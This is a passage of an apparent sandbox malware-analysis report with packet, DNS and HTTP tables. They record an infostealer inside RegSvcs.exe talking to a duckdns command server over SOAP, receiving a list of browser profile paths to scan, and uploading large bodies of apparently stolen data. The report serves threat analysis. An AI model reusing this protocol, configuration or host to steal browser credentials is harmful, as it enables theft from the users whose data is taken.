                                                                      Oct 7, 2024 11:29:32.991306067 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.991316080 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.991319895 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.991323948 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.991427898 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.991431952 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.991436005 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.991440058 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.991444111 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.991449118 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.991453886 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.991457939 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.991461039 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.991465092 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.991533995 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.991539001 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.991543055 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.991552114 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.991625071 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.991628885 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.991631985 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.991646051 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.991650105 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.991667032 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.991671085 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.991673946 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.991718054 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.991744995 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.991808891 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.991812944 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.991853952 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.991863966 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.991914034 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.991918087 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.991972923 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.991981983 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.992018938 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.992033958 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.992141962 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.992151976 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.992189884 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.992247105 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.992250919 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.992263079 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.992292881 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.992296934 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.992345095 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.992348909 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.992378950 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.992399931 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.992443085 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.992446899 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.992502928 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.992506981 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.992562056 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.992580891 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.992674112 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.992677927 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.992727041 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.992769957 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.992873907 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.992882967 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.992897987 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.992902040 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.992924929 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.992928982 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.992985010 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.992990017 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.993031025 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.993035078 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.993051052 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.993055105 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.993120909 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.993124962 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.993175983 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.993185043 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.993211985 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.993216991 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.993282080 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.993292093 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.993330002 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.993334055 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.993371010 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.993381023 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.993424892 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.993429899 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.993469000 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.993473053 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.993485928 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.993489981 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.993556976 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.993561983 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.993621111 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.993626118 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.993685007 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.993731976 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.993736029 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:33.039793015 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:33.954171896 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:33.967540026 CEST4972134221192.168.2.845.88.88.45
                                                                      Oct 7, 2024 11:29:33.967814922 CEST4971634221192.168.2.845.88.88.45

                                                                      UDP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Oct 7, 2024 11:29:18.505965948 CEST5525353192.168.2.81.1.1.1
                                                                      Oct 7, 2024 11:29:18.623950005 CEST53552531.1.1.1192.168.2.8
                                                                      Oct 7, 2024 11:29:24.975972891 CEST5087053192.168.2.81.1.1.1
                                                                      Oct 7, 2024 11:29:59.754066944 CEST5360417162.159.36.2192.168.2.8
                                                                      Oct 7, 2024 11:30:00.399574041 CEST53514801.1.1.1192.168.2.8

                                                                      DNS Queries

                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                      Oct 7, 2024 11:29:18.505965948 CEST192.168.2.81.1.1.10xb717Standard query (0)billred229102.duckdns.orgA (IP address)IN (0x0001)false
                                                                      Oct 7, 2024 11:29:24.975972891 CEST192.168.2.81.1.1.10x2573Standard query (0)api.ip.sbA (IP address)IN (0x0001)false

                                                                      DNS Answers

                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                      Oct 7, 2024 11:29:18.623950005 CEST1.1.1.1192.168.2.80xb717No error (0)billred229102.duckdns.org45.88.88.45A (IP address)IN (0x0001)false
                                                                      Oct 7, 2024 11:29:24.983004093 CEST1.1.1.1192.168.2.80x2573No error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false

                                                                      HTTP Request Dependency Graph

                                                                      • billred229102.duckdns.org:34221

                                                                      HTTP Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.84970745.88.88.45342214468C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Oct 7, 2024 11:29:18.652009010 CEST252OUTPOST / HTTP/1.1
                                                                      Content-Type: text/xml; charset=utf-8
                                                                      SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                                                      Host: billred229102.duckdns.org:34221
                                                                      Content-Length: 137
                                                                      Expect: 100-continue
                                                                      Accept-Encoding: gzip, deflate
                                                                      Connection: Keep-Alive
                                                                      Oct 7, 2024 11:29:19.248584032 CEST25INHTTP/1.1 100 Continue
                                                                      Oct 7, 2024 11:29:19.382383108 CEST359INHTTP/1.1 200 OK
                                                                      Content-Length: 212
                                                                      Content-Type: text/xml; charset=utf-8
                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                      Date: Mon, 07 Oct 2024 09:29:19 GMT
                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                                                                      Oct 7, 2024 11:29:24.471509933 CEST235OUTPOST / HTTP/1.1
                                                                      Content-Type: text/xml; charset=utf-8
                                                                      SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                                                                      Host: billred229102.duckdns.org:34221
                                                                      Content-Length: 144
                                                                      Expect: 100-continue
                                                                      Accept-Encoding: gzip, deflate
                                                                      Oct 7, 2024 11:29:24.708343983 CEST25INHTTP/1.1 100 Continue
                                                                      Oct 7, 2024 11:29:24.940987110 CEST1236INHTTP/1.1 200 OK
                                                                      Content-Length: 4744
                                                                      Content-Type: text/xml; charset=utf-8
                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                      Date: Mon, 07 Oct 2024 09:29:24 GMT
                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c [TRUNCATED]
                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Chromium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google(x86)\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Roaming\Opera Software\</b:string><b:string>%USERPROFILE%\AppData\Local\MapleStudio\ChromePlus\User Data</b:string [TRUNCATED]


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      1192.168.2.84971045.88.88.45342213832C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Oct 7, 2024 11:29:21.691458941 CEST252OUTPOST / HTTP/1.1
                                                                      Content-Type: text/xml; charset=utf-8
                                                                      SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                                                      Host: billred229102.duckdns.org:34221
                                                                      Content-Length: 137
                                                                      Expect: 100-continue
                                                                      Accept-Encoding: gzip, deflate
                                                                      Connection: Keep-Alive
                                                                      Oct 7, 2024 11:29:22.279304981 CEST359INHTTP/1.1 200 OK
                                                                      Content-Length: 212
                                                                      Content-Type: text/xml; charset=utf-8
                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                      Date: Mon, 07 Oct 2024 09:29:22 GMT
                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                                                                      Oct 7, 2024 11:29:27.349452972 CEST235OUTPOST / HTTP/1.1
                                                                      Content-Type: text/xml; charset=utf-8
                                                                      SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                                                                      Host: billred229102.duckdns.org:34221
                                                                      Content-Length: 144
                                                                      Expect: 100-continue
                                                                      Accept-Encoding: gzip, deflate
                                                                      Oct 7, 2024 11:29:27.589410067 CEST1236INHTTP/1.1 200 OK
                                                                      Content-Length: 4744
                                                                      Content-Type: text/xml; charset=utf-8
                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                      Date: Mon, 07 Oct 2024 09:29:27 GMT
                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c [TRUNCATED]
                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Chromium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google(x86)\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Roaming\Opera Software\</b:string><b:string>%USERPROFILE%\AppData\Local\MapleStudio\ChromePlus\User Data</b:string [TRUNCATED]


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      2192.168.2.84971345.88.88.45342214468C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Oct 7, 2024 11:29:27.907888889 CEST233OUTPOST / HTTP/1.1
                                                                      Content-Type: text/xml; charset=utf-8
                                                                      SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                                                                      Host: billred229102.duckdns.org:34221
                                                                      Content-Length: 962483
                                                                      Expect: 100-continue
                                                                      Accept-Encoding: gzip, deflate
                                                                      Oct 7, 2024 11:29:29.517736912 CEST294INHTTP/1.1 200 OK
                                                                      Content-Length: 147
                                                                      Content-Type: text/xml; charset=utf-8
                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                      Date: Mon, 07 Oct 2024 09:29:29 GMT
                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      3192.168.2.84971445.88.88.45342214468C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Oct 7, 2024 11:29:29.525648117 CEST253OUTPOST / HTTP/1.1
                                                                      Content-Type: text/xml; charset=utf-8
                                                                      SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                                      Host: billred229102.duckdns.org:34221
                                                                      Content-Length: 962475
                                                                      Expect: 100-continue
                                                                      Accept-Encoding: gzip, deflate
                                                                      Connection: Keep-Alive
                                                                      Oct 7, 2024 11:29:30.996665955 CEST408INHTTP/1.1 200 OK
                                                                      Content-Length: 261
                                                                      Content-Type: text/xml; charset=utf-8
                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                      Date: Mon, 07 Oct 2024 09:29:30 GMT
                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      4192.168.2.84971645.88.88.45342213832C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Oct 7, 2024 11:29:31.062418938 CEST233OUTPOST / HTTP/1.1
                                                                      Content-Type: text/xml; charset=utf-8
                                                                      SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                                                                      Host: billred229102.duckdns.org:34221
                                                                      Content-Length: 962603
                                                                      Expect: 100-continue
                                                                      Accept-Encoding: gzip, deflate
                                                                      Oct 7, 2024 11:29:32.520620108 CEST294INHTTP/1.1 200 OK
                                                                      Content-Length: 147
                                                                      Content-Type: text/xml; charset=utf-8
                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                      Date: Mon, 07 Oct 2024 09:29:32 GMT
                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      5192.168.2.84972145.88.88.45342213832C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Oct 7, 2024 11:29:32.528482914 CEST253OUTPOST / HTTP/1.1
                                                                      Content-Type: text/xml; charset=utf-8
                                                                      SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                                      Host: billred229102.duckdns.org:34221
                                                                      Content-Length: 962595
                                                                      Expect: 100-continue
                                                                      Accept-Encoding: gzip, deflate
                                                                      Connection: Keep-Alive
                                                                      Oct 7, 2024 11:29:33.954171896 CEST408INHTTP/1.1 200 OK
                                                                      Content-Length: 261
                                                                      Content-Type: text/xml; charset=utf-8
                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                      Date: Mon, 07 Oct 2024 09:29:33 GMT
